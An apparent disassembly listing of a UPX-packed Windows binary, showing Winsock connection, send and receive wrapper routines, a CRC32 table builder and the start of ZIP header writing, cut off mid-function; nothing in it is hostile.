; =============== S U B R O U T I N E =======================================
sub_415CE0 proc near ; CODE XREF: sub_4164F0+60�p
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = dword ptr -60h
var_54 = byte ptr -54h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 80h
mov eax, dword_42A290
push ebx
push esi
mov esi, ecx
mov [esp+88h+var_4], eax
mov eax, [esi+4]
xor ebx, ebx
cmp eax, ebx
mov [esp+88h+var_7C], ebx
mov [esp+88h+var_70], 1
jz loc_415F71
cmp [esi+8], ebx
jz loc_415F71
push edi
mov edi, [esp+8Ch+arg_4]
push edi
call sub_415CA0
add esp, 4
test eax, eax
jz short loc_415D6B
push 0Ah
lea eax, [esp+90h+var_80]
push eax
push edi
call sub_41AA5A
mov ecx, [esp+98h+var_80]
add esp, 0Ch
cmp ecx, edi
jnz short loc_415D5F
loc_415D45: ; CODE XREF: sub_415CE0+266�j
; sub_415CE0+271�j
pop edi
pop esi
mov eax, 0FAEh
pop ebx
mov ecx, [esp+80h+var_4]
call sub_4192B6
add esp, 80h
retn 8
; ---------------------------------------------------------------------------
loc_415D5F: ; CODE XREF: sub_415CE0+63�j
push eax
call sub_411F56 ; htons
mov [esp+8Ch+var_80], eax
jmp short loc_415D87
; ---------------------------------------------------------------------------
loc_415D6B: ; CODE XREF: sub_415CE0+4B�j
push offset aTcp ; "tcp"
push edi
call sub_422EDA ; getservbyname
cmp eax, ebx
jz loc_415F3C
mov cx, [eax+8]
mov word ptr [esp+8Ch+var_80], cx
loc_415D87: ; CODE XREF: sub_415CE0+89�j
mov edi, [esp+8Ch+arg_0]
push ebp
push edi
call sub_411F6E ; inet_addr
cmp eax, 0FFFFFFFFh
mov [esp+90h+var_74], eax
jz short loc_415DB0
lea edx, [esp+90h+var_74]
mov [esp+90h+var_6C], edx
mov [esp+90h+var_68], ebx
lea ebp, [esp+90h+var_6C]
jmp short loc_415DE1
; ---------------------------------------------------------------------------
loc_415DB0: ; CODE XREF: sub_415CE0+BC�j
push edi
call sub_411F32 ; gethostbyname
cmp eax, ebx
jnz short loc_415DD5
mov eax, 0FA7h
loc_415DBF: ; CODE XREF: sub_415CE0+1C9�j
; sub_415CE0+1D3�j ...
pop ebp
pop edi
pop esi
pop ebx
mov ecx, [esp+80h+var_4]
call sub_4192B6
add esp, 80h
retn 8
; ---------------------------------------------------------------------------
loc_415DD5: ; CODE XREF: sub_415CE0+D8�j
mov ebp, [eax+0Ch]
mov eax, [ebp+0]
mov ecx, [eax]
mov [esp+90h+var_60], ecx
loc_415DE1: ; CODE XREF: sub_415CE0+CE�j
mov eax, [ebp+0]
test eax, eax
jz loc_415EC2
lea esp, [esp+0]
loc_415DF0: ; CODE XREF: sub_415CE0+193�j
mov edx, [eax]
push 0
push 1
push 2
mov [esp+9Ch+var_60], edx
call sub_411F5C ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_415EAE
mov cx, word ptr [esp+90h+var_80]
push 4
lea edx, [esp+94h+var_7C]
push edx
push 0FFFFFF7Fh
push 0FFFFh
push eax
mov [esp+0A4h+var_64], 2
mov [esp+0A4h+var_62], cx
call sub_411F68 ; setsockopt
call sub_4139F0
mov edi, eax
test edi, edi
jz short loc_415E66
nop
loc_415E40: ; CODE XREF: sub_415CE0+184�j
mov ecx, [esi]
push 10h
lea eax, [esp+94h+var_64]
push eax
push ecx
call sub_411F50 ; connect
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_415EC2
dec edi
jz short loc_415E6B
push 3E8h
call dword_42408C ; Sleep
jmp short loc_415E40
; ---------------------------------------------------------------------------
loc_415E66: ; CODE XREF: sub_415CE0+15D�j
cmp ebx, 0FFFFFFFFh
jnz short loc_415EC2
loc_415E6B: ; CODE XREF: sub_415CE0+177�j
mov eax, [ebp+4]
add ebp, 4
test eax, eax
jnz loc_415DF0
call sub_411F74 ; WSAGetLastError
mov ecx, eax
sub ecx, 2733h
jz short loc_415EC2
sub ecx, 19h
jz short loc_415EA4
dec ecx
jz short loc_415EB8
push eax
lea edx, [esp+94h+var_54]
push offset aUnexpectedErro ; "unexpected error %d from winsock"
push edx
call dword_4241F4 ; wsprintfA
add esp, 0Ch
loc_415EA4: ; CODE XREF: sub_415CE0+1AB�j
mov eax, 0FAFh
jmp loc_415DBF
; ---------------------------------------------------------------------------
loc_415EAE: ; CODE XREF: sub_415CE0+126�j
mov eax, 0FA8h
jmp loc_415DBF
; ---------------------------------------------------------------------------
loc_415EB8: ; CODE XREF: sub_415CE0+1AE�j
mov eax, 0FB1h
jmp loc_415DBF
; ---------------------------------------------------------------------------
loc_415EC2: ; CODE XREF: sub_415CE0+106�j
; sub_415CE0+174�j ...
mov edx, [esi]
mov eax, dword_430AAC
lea ecx, [esp+90h+var_70]
push ecx
push 8004667Eh
push edx
mov [esi+24h], eax
call sub_422ED4 ; ioctlsocket
mov ecx, [esi]
xor eax, eax
mov [esi+28h], eax
mov [esi+2Ch], ecx
inc dword ptr [esi+28h]
mov edx, dword_42A040
mov [esi+130h], eax
lea eax, [esp+90h+var_7C]
push eax
lea ecx, [esp+94h+var_78]
push ecx
push 1001h
mov [esi+12Ch], edx
mov edx, [esi]
push 0FFFFh
push edx
mov [esp+0A4h+var_78], 0FAF0h
mov [esp+0A4h+var_7C], 4
call sub_422ECE ; getsockopt
mov eax, [esp+90h+var_78]
cmp eax, 0FAF0h
jnb short loc_415F35
mov [esi+20h], eax
loc_415F35: ; CODE XREF: sub_415CE0+250�j
xor eax, eax
jmp loc_415DBF
; ---------------------------------------------------------------------------
loc_415F3C: ; CODE XREF: sub_415CE0+98�j
call sub_411F74 ; WSAGetLastError
cmp eax, 2AFCh
jz loc_415D45
cmp eax, 2AFBh
jz loc_415D45
pop edi
pop esi
add eax, 0FFFFEC78h
pop ebx
mov ecx, [esp+80h+var_4]
call sub_4192B6
add esp, 80h
retn 8
; ---------------------------------------------------------------------------
loc_415F71: ; CODE XREF: sub_415CE0+29�j
; sub_415CE0+32�j
mov ecx, [esp+88h+var_4]
pop esi
mov eax, 0FA1h
pop ebx
call sub_4192B6
add esp, 80h
retn 8
sub_415CE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415F90 proc near ; CODE XREF: sub_4162A0+1F�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 104h
mov eax, dword_42A290
push ebx
push esi
mov esi, ecx
mov ecx, [esi]
mov [esp+10Ch+var_4], eax
lea eax, [esi+28h]
mov dword ptr [eax], 0
mov [esi+2Ch], ecx
mov edx, [eax]
push edi
mov edi, [esp+110h+arg_0]
inc edx
test edi, edi
mov [eax], edx
lea ecx, [esi+12Ch]
jz short loc_415FD3
mov dword ptr [ecx], 0
jmp short loc_415FDB
; ---------------------------------------------------------------------------
loc_415FD3: ; CODE XREF: sub_415F90+39�j
mov edx, dword_42A040
mov [ecx], edx
loc_415FDB: ; CODE XREF: sub_415F90+41�j
push ecx
push 0
push 0
push eax
push 0
call sub_411F44 ; select
cmp eax, 0FFFFFFFFh
mov ebx, dword_4241F4
jnz short loc_416015
call sub_411F74 ; WSAGetLastError
cmp eax, 2734h
jnz short loc_416003
test edi, edi
jnz short loc_416073 ; jumptable 0041604F case 0
loc_416003: ; CODE XREF: sub_415F90+6D�j
push eax
lea eax, [esp+114h+var_104]
push offset aConnectionGet_ ; "connection::get_buffer() unexpected err"...
push eax
call ebx ; wsprintfA
add esp, 0Ch
jmp short loc_41601D
; ---------------------------------------------------------------------------
loc_416015: ; CODE XREF: sub_415F90+61�j
test eax, eax
jnz short loc_41601D
test edi, edi
jnz short loc_416073 ; jumptable 0041604F case 0
loc_41601D: ; CODE XREF: sub_415F90+83�j
; sub_415F90+87�j
mov ecx, [esi+20h]
mov edx, [esi+4]
mov eax, [esi]
push 0
push ecx
push edx
push eax
call sub_411F62 ; recv
test eax, eax
jz short loc_416056 ; jumptable 0041604F cases 15-19,22
cmp eax, 0FFFFFFFFh
jnz short loc_4160A2
call sub_411F74 ; WSAGetLastError
lea ecx, [eax-2733h]
cmp ecx, 16h ; switch 23 cases
ja short loc_416090 ; default
; jumptable 0041604F cases 1-14,20,21
movzx ecx, byte_4160D4[ecx]
jmp off_4160C8[ecx*4] ; switch jump
loc_416056: ; CODE XREF: sub_415F90+A1�j
; DATA XREF: UPX0:off_4160C8�o
pop edi ; jumptable 0041604F cases 15-19,22
pop esi
mov eax, 0FB0h
pop ebx
mov ecx, [esp+104h+var_4]
call sub_4192B6
add esp, 104h
retn 4
; ---------------------------------------------------------------------------
loc_416073: ; CODE XREF: sub_415F90+71�j
; sub_415F90+8B�j ...
pop edi ; jumptable 0041604F case 0
pop esi
mov eax, 0FADh
pop ebx
mov ecx, [esp+104h+var_4]
call sub_4192B6
add esp, 104h
retn 4
; ---------------------------------------------------------------------------
loc_416090: ; CODE XREF: sub_415F90+B6�j
; sub_415F90+BF�j
; DATA XREF: ...
push eax ; default
; jumptable 0041604F cases 1-14,20,21
lea edx, [esp+114h+var_104]
push offset aConnectionGe_0 ; "connection::get_buffer() unexpected err"...
push edx
call ebx ; wsprintfA
add esp, 0Ch
xor eax, eax
loc_4160A2: ; CODE XREF: sub_415F90+A6�j
mov ecx, [esp+110h+var_4]
pop edi
mov [esi+14h], eax
mov dword ptr [esi+0Ch], 0
pop esi
xor eax, eax
pop ebx
call sub_4192B6
add esp, 104h
retn 4
sub_415F90 endp
; ---------------------------------------------------------------------------
align 4
off_4160C8 dd offset loc_416073 ; DATA XREF: sub_415F90+BF�r
dd offset loc_416056 ; jump table for switch statement
dd offset loc_416090
byte_4160D4 db 0, 2, 2, 2 ; DATA XREF: sub_415F90+B8�r
db 2, 2, 2, 2 ; indirect table for switch statement
db 2, 2, 2, 2
db 2, 2, 2, 1
db 1, 1, 1, 1
db 2, 2, 1
align 10h
; =============== S U B R O U T I N E =======================================
sub_4160F0 proc near ; CODE XREF: sub_416210+44�p
; sub_4162E0+18�p ...
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 204h
mov eax, dword_42A290
push ebx
push ebp
push esi
mov esi, ecx
lea ebp, [esi+28h]
mov dword ptr [ebp+0], 0
mov [esp+210h+var_4], eax
mov eax, [esi]
mov [esi+2Ch], eax
mov ecx, [ebp+0]
inc ecx
push edi
mov edi, [esp+214h+arg_4]
test edi, edi
mov [ebp+0], ecx
mov ecx, dword_42A040
mov [esi+12Ch], ecx
jbe loc_4161E6
mov ebx, [esp+214h+arg_0]
loc_416140: ; CODE XREF: sub_4160F0+B6�j
; sub_4160F0+C8�j
lea eax, [esi+12Ch]
push eax
push 0
push ebp
push 0
push 0
call sub_411F44 ; select
cmp eax, 0FFFFFFFFh
jnz short loc_416171
call sub_411F74 ; WSAGetLastError
push eax
lea edx, [esp+218h+var_204]
push offset aConnectionPut_ ; "connection::put_data() unexpected error"...
push edx
call dword_4241F4 ; wsprintfA
add esp, 0Ch
loc_416171: ; CODE XREF: sub_4160F0+66�j
mov eax, [esi+20h]
cmp edi, eax
jg short loc_41617A
mov eax, edi
loc_41617A: ; CODE XREF: sub_4160F0+86�j
push 0
push eax
mov eax, [esi]
push ebx
push eax
call sub_411F3E ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4161A8
call sub_411F74 ; WSAGetLastError
cmp eax, 2733h
jl short loc_4161C8
cmp eax, 2734h
jg short loc_4161BA
push 1
call dword_42408C ; Sleep
jmp short loc_416140
; ---------------------------------------------------------------------------
loc_4161A8: ; CODE XREF: sub_4160F0+99�j
sub edi, eax
add ebx, eax
test edi, edi
jbe short loc_4161E6
push 1
call dword_42408C ; Sleep
jmp short loc_416140
; ---------------------------------------------------------------------------
loc_4161BA: ; CODE XREF: sub_4160F0+AC�j
cmp eax, 2749h
jnz short loc_4161C8
mov eax, 0FB0h
jmp short loc_4161E8
; ---------------------------------------------------------------------------
loc_4161C8: ; CODE XREF: sub_4160F0+A5�j
; sub_4160F0+CF�j
push eax
lea ecx, [esp+218h+var_104]
push offset aConnectionPu_0 ; "connection::put_data() unexpected error"...
push ecx
call dword_4241F4 ; wsprintfA
add esp, 0Ch
mov eax, 0FA2h
jmp short loc_4161E8
; ---------------------------------------------------------------------------
loc_4161E6: ; CODE XREF: sub_4160F0+43�j
; sub_4160F0+BE�j
xor eax, eax
loc_4161E8: ; CODE XREF: sub_4160F0+D6�j
; sub_4160F0+F4�j
mov ecx, [esp+214h+var_4]
pop edi
pop esi
pop ebp
pop ebx
call sub_4192B6
add esp, 204h
retn 8
sub_4160F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416210 proc near ; CODE XREF: sub_416300+18�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
mov ebp, [esp+8+arg_4]
test ebp, ebp
push esi
push edi
mov ebx, ecx
jz short loc_416296
mov edi, edi
loc_416220: ; CODE XREF: sub_416210+6E�j
mov edx, [ebx+10h]
mov eax, [ebx+20h]
mov edi, [ebx+8]
mov esi, [esp+10h+arg_0]
lea ecx, [edx+ebp]
cmp ecx, eax
jl short loc_416280
sub eax, edx
mov ebp, eax
add edi, edx
mov ecx, ebp
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebx+20h]
mov ecx, [ebx+8]
push eax
push ecx
mov ecx, ebx
call sub_4160F0
test eax, eax
jnz short loc_416298
mov eax, [esp+10h+arg_4]
mov edx, [esp+10h+arg_0]
sub eax, ebp
add edx, ebp
test eax, eax
mov [esp+10h+arg_4], eax
mov dword ptr [ebx+10h], 0
mov [esp+10h+arg_0], edx
jz short loc_416296
mov ebp, eax
jmp short loc_416220
; ---------------------------------------------------------------------------
loc_416280: ; CODE XREF: sub_416210+22�j
add edi, [ebx+10h]
mov ecx, ebp
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
add [ebx+10h], ebp
loc_416296: ; CODE XREF: sub_416210+C�j
; sub_416210+6A�j
xor eax, eax
loc_416298: ; CODE XREF: sub_416210+4B�j
pop edi
pop esi
pop ebp
pop ebx
retn 8
sub_416210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4162A0 proc near ; CODE XREF: sub_413B10+DD�p
; sub_413B10+36E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_4162B0
mov eax, 0FAAh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4162B0: ; CODE XREF: sub_4162A0+7�j
mov eax, [esi+0Ch]
cmp eax, [esi+14h]
jb short loc_4162C8
mov ecx, [esp+4+arg_4]
push ecx
mov ecx, esi
call sub_415F90
test eax, eax
jnz short loc_4162DC
loc_4162C8: ; CODE XREF: sub_4162A0+16�j
mov eax, [esi+0Ch]
mov edx, [esi+4]
mov cl, [edx+eax]
mov edx, [esp+4+arg_8]
mov [edx], cl
inc dword ptr [esi+0Ch]
xor eax, eax
loc_4162DC: ; CODE XREF: sub_4162A0+26�j
pop esi
retn
sub_4162A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4162E0 proc near ; CODE XREF: sub_4138B0+20�p
; sub_4141C0+F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
test ecx, ecx
jnz short loc_4162EE
mov eax, 0FAAh
retn
; ---------------------------------------------------------------------------
loc_4162EE: ; CODE XREF: sub_4162E0+6�j
mov eax, [esp+arg_8]
mov edx, [esp+arg_4]
push eax
push edx
call sub_4160F0
retn
sub_4162E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416300 proc near ; CODE XREF: sub_4138E0+58�p
; sub_4138E0+A9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
test ecx, ecx
jnz short loc_41630E
mov eax, 0FAAh
retn
; ---------------------------------------------------------------------------
loc_41630E: ; CODE XREF: sub_416300+6�j
mov eax, [esp+arg_8]
mov edx, [esp+arg_4]
push eax
push edx
call sub_416210
retn
sub_416300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416320 proc near ; CODE XREF: sub_4138E0+FF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_416330
mov eax, 0FAAh
pop esi
retn
; ---------------------------------------------------------------------------
loc_416330: ; CODE XREF: sub_416320+7�j
mov eax, [esi+10h]
mov ecx, [esi+8]
push eax
push ecx
mov ecx, esi
call sub_4160F0
test eax, eax
jnz short loc_416346
mov [esi+10h], eax
loc_416346: ; CODE XREF: sub_416320+21�j
pop esi
retn
sub_416320 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416350 proc near ; CODE XREF: sub_414690+73C�p
; sub_416350+2A�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_411F6E ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_416398
push esi
call sub_411F32 ; gethostbyname
test eax, eax
jnz short loc_416389
push edi
xor edi, edi
call sub_411F74 ; WSAGetLastError
cmp eax, 276Dh
jnz short loc_416384
push esi
call sub_416350
add esp, 4
mov edi, eax
loc_416384: ; CODE XREF: sub_416350+27�j
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_416389: ; CODE XREF: sub_416350+18�j
push 2Eh
push esi
call sub_41A3F0
add esp, 8
test eax, eax
jnz short loc_41639C
loc_416398: ; CODE XREF: sub_416350+E�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41639C: ; CODE XREF: sub_416350+46�j
inc eax
push eax
call sub_416350
add esp, 4
test eax, eax
jnz short loc_4163AC
mov eax, esi
loc_4163AC: ; CODE XREF: sub_416350+58�j
pop esi
retn
sub_416350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4163B0 proc near ; CODE XREF: sub_4137C0+90�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push eax
push ecx
call sub_411F38 ; gethostname
test eax, eax
jz short loc_4163C9
add eax, 0FFFFEC78h
retn
; ---------------------------------------------------------------------------
loc_4163C9: ; CODE XREF: sub_4163B0+11�j
xor eax, eax
retn
sub_4163B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4163D0 proc near ; CODE XREF: sub_4164F0+B8�p
arg_0 = dword ptr 4
push esi
push 0Ch
mov esi, ecx
call sub_4191C1
xor ecx, ecx
add esp, 4
cmp eax, ecx
jz short loc_4163E8
mov [eax+4], ecx
jmp short loc_4163EA
; ---------------------------------------------------------------------------
loc_4163E8: ; CODE XREF: sub_4163D0+11�j
xor eax, eax
loc_4163EA: ; CODE XREF: sub_4163D0+16�j
mov edx, [esi]
mov [eax], edx
mov edx, [esi+4]
mov [eax+4], edx
mov edx, [esp+4+arg_0]
cmp edx, ecx
mov [eax+8], esi
mov [esi+4], eax
mov [esi], edx
mov [esi+8], ecx
mov eax, esi
pop esi
jz short locret_416417
lea ebx, [ebx+0]
loc_416410: ; CODE XREF: sub_4163D0+45�j
mov eax, [eax+4]
cmp [eax], ecx
jnz short loc_416410
locret_416417: ; CODE XREF: sub_4163D0+38�j
retn 4
sub_4163D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416420 proc near ; CODE XREF: sub_4164B0+2A�p
; sub_4164F0+7E�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
cmp dword ptr [esi], 0
jz loc_4164AB
mov eax, [esp+4+arg_0]
mov eax, [eax]
loc_416432: ; CODE XREF: sub_416420+22�j
mov ecx, [esi]
cmp [ecx], eax
jz short loc_416448
mov esi, [esi+4]
test esi, esi
jz short loc_4164AB
cmp dword ptr [esi], 0
jnz short loc_416432
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_416448: ; CODE XREF: sub_416420+16�j
push edi
mov edi, [esi+4]
test edi, edi
jz short loc_4164AA
push ebx
mov ebx, [esi]
test ebx, ebx
jz short loc_416472
mov edx, [ebx+4]
push edx
call sub_41930D
mov eax, [ebx+8]
push eax
call sub_41930D
push ebx
call sub_41930D
add esp, 0Ch
loc_416472: ; CODE XREF: sub_416420+35�j
mov eax, [esi+4]
mov ecx, [eax]
mov [esi], ecx
mov edx, [eax+4]
mov [esi+4], edx
mov esi, [edi]
test esi, esi
pop ebx
jz short loc_4164A1
mov eax, [esi+4]
push eax
call sub_41930D
mov ecx, [esi+8]
push ecx
call sub_41930D
push esi
call sub_41930D
add esp, 0Ch
loc_4164A1: ; CODE XREF: sub_416420+64�j
push edi
call sub_41930D
add esp, 4
loc_4164AA: ; CODE XREF: sub_416420+2E�j
pop edi
loc_4164AB: ; CODE XREF: sub_416420+6�j
; sub_416420+1D�j
pop esi
retn 4
sub_416420 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4164B0 proc near ; CODE XREF: sub_413870+6�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_4164C0
mov eax, 0FAAh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4164C0: ; CODE XREF: sub_4164B0+7�j
mov eax, [esi]
push eax
call sub_411F4A ; closesocket
cmp eax, 0FFFFFFFFh
jnz short loc_4164D4
mov eax, 0FACh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4164D4: ; CODE XREF: sub_4164B0+1B�j
push esi
mov ecx, offset dword_430AC8
call sub_416420
xor eax, eax
pop esi
retn
sub_4164B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4164F0 proc near ; CODE XREF: sub_4137C0+4C�p
; sub_4137C0+71�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push 134h
call sub_4191C1
mov esi, eax
xor ebx, ebx
add esp, 4
cmp esi, ebx
jz loc_41659A
push 0FAF0h
mov [esi], ebx
mov [esi+0Ch], ebx
mov [esi+10h], ebx
mov [esi+14h], ebx
mov [esi+18h], ebx
mov [esi+4], ebx
call sub_4191C1
push 0FAF0h
mov [esi+4], eax
call sub_4191C1
mov ecx, [esp+10h+arg_0]
add esp, 8
mov [esi+8], eax
mov eax, [esp+8+arg_4]
push edi
push eax
push ecx
mov ecx, esi
mov dword ptr [esi+20h], 0FAF0h
mov [esi+1Ch], ebx
call sub_415CE0
mov edi, eax
cmp edi, ebx
jz short loc_4165A2
mov edx, [esi]
push edx
call sub_411F4A ; closesocket
cmp eax, 0FFFFFFFFh
jz short loc_416573
push esi
mov ecx, offset dword_430AC8
call sub_416420
loc_416573: ; CODE XREF: sub_4164F0+76�j
mov eax, [esp+0Ch+arg_8]
mov [eax], ebx
mov ecx, [esi+4]
push ecx
call sub_41930D
mov edx, [esi+8]
push edx
call sub_41930D
push esi
call sub_41930D
add esp, 0Ch
mov eax, edi
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41659A: ; CODE XREF: sub_4164F0+15�j
pop esi
mov eax, 0FA3h
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4165A2: ; CODE XREF: sub_4164F0+69�j
push esi
mov ecx, offset dword_430AC8
call sub_4163D0
mov eax, [esp+0Ch+arg_8]
pop edi
mov [eax], esi
pop esi
xor eax, eax
pop ebx
retn
sub_4164F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4165C0 proc near ; CODE XREF: sub_407450+BB�p
; sub_407450+E7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
push ebx
push edi
mov edi, [esp+8+arg_8]
xor ebx, ebx
cmp edi, ebx
jz loc_4166EF
cmp [esp+8+arg_C], ebx
jz loc_4166EF
push esi
mov esi, [esp+0Ch+arg_10]
cmp esi, ebx
jz loc_4166EE
push ebp
mov [edi+8], ebx
push 64h
mov ds:dword_47C3CC, offset dword_42A300
call sub_4191C1
mov edx, [esp+14h+arg_14]
mov ebp, eax
mov eax, [esp+14h+arg_0]
mov [ebp+38h], eax
mov [ebp+48h], eax
mov eax, [esp+14h+arg_4]
mov [ebp+4Ch], eax
mov [ebp+5Ch], edi
mov ecx, 1
add esp, 4
mov [ebp+60h], ebx
mov [ebp+24h], ebx
mov [ebp+20h], ebx
mov [ebp+1Ch], ebx
mov [ebp+40h], ebx
mov [ebp+3Ch], ebx
mov [ebp+50h], ecx
mov [ebp+58h], ebx
mov edi, offset byte_4243C3
xor eax, eax
mov dword_42A04C, edx
mov dword_430B14, ebx
repe cmpsb
jz short loc_41666C
push 51h
call sub_4191C1
mov ecx, [esp+14h+arg_10]
add esp, 4
mov dword_430B14, eax
mov edx, eax
loc_416662: ; CODE XREF: sub_4165C0+AA�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_416662
loc_41666C: ; CODE XREF: sub_4165C0+8B�j
call sub_416740
mov esi, [esp+10h+arg_C]
push esi
push ebp
mov dword_430AD8, eax
mov ds:dword_47C3D0, ebx
mov dword_42A058, ebx
call sub_416DF0
push esi
push ebp
call sub_4169F0
mov edx, [ebp+18h]
mov edi, [ebp+20h]
mov eax, [ebp+24h]
mov ecx, ds:dword_47C3D0
add edx, edi
add edx, eax
lea eax, [ecx+edx+2Eh]
mov edx, dword_430B20
push esi
push edx
mov edx, ds:dword_47C3D4
push edx
mov ds:dword_47C3D0, eax
push ecx
sub eax, ecx
push eax
push 1
call sub_416C60
add esp, 28h
call sub_416760
mov eax, dword_430B14
cmp eax, ebx
jz short loc_4166E4
push eax
call sub_41930D
add esp, 4
loc_4166E4: ; CODE XREF: sub_4165C0+119�j
push ebp
call sub_41930D
add esp, 4
pop ebp
loc_4166EE: ; CODE XREF: sub_4165C0+21�j
pop esi
loc_4166EF: ; CODE XREF: sub_4165C0+A�j
; sub_4165C0+14�j
pop edi
pop ebx
retn
sub_4165C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416700 proc near ; CODE XREF: sub_416740+9�p
push 400h
call sub_419DCB
add esp, 4
xor edx, edx
push esi
loc_416710: ; CODE XREF: sub_416700+35�j
mov ecx, edx
mov esi, 8
loc_416717: ; CODE XREF: sub_416700+29�j
test cl, 1
jz short loc_416726
shr ecx, 1
xor ecx, 0EDB88320h
jmp short loc_416728
; ---------------------------------------------------------------------------
loc_416726: ; CODE XREF: sub_416700+1A�j
shr ecx, 1
loc_416728: ; CODE XREF: sub_416700+24�j
dec esi
jnz short loc_416717
mov [eax+edx*4], ecx
inc edx
cmp edx, 100h
jl short loc_416710
mov dword_430AE0, eax
pop esi
retn
sub_416700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416740 proc near ; CODE XREF: sub_4165C0:loc_41666C�p
; sub_417060+10�p
mov eax, dword_430AE0
test eax, eax
jnz short locret_416753
call sub_416700
mov eax, dword_430AE0
locret_416753: ; CODE XREF: sub_416740+7�j
retn
sub_416740 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416760 proc near ; CODE XREF: sub_4165C0+10D�p
mov eax, dword_430AE0
test eax, eax
jz short locret_41677C
push eax
call sub_419DDD
add esp, 4
mov dword_430AE0, 0
locret_41677C: ; CODE XREF: sub_416760+7�j
retn
sub_416760 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416780 proc near ; CODE XREF: sub_416DF0+108�p
; sub_416DF0+216�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
push 50h
push esi
call sub_404640
push 4Bh
push esi
call sub_404640
push 3
push esi
call sub_404640
push 4
push esi
call sub_404640
mov edi, [esp+28h+arg_0]
xor eax, eax
mov al, [edi+2]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+3]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+2Ch]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+2Dh]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+6]
add esp, 40h
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+7]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+8]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+9]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+0Ah]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+0Bh]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+0Ch]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+0Dh]
push edx
push esi
call sub_404640
add esp, 40h
xor eax, eax
mov al, [edi+0Eh]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+0Fh]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+10h]
push edx
push esi
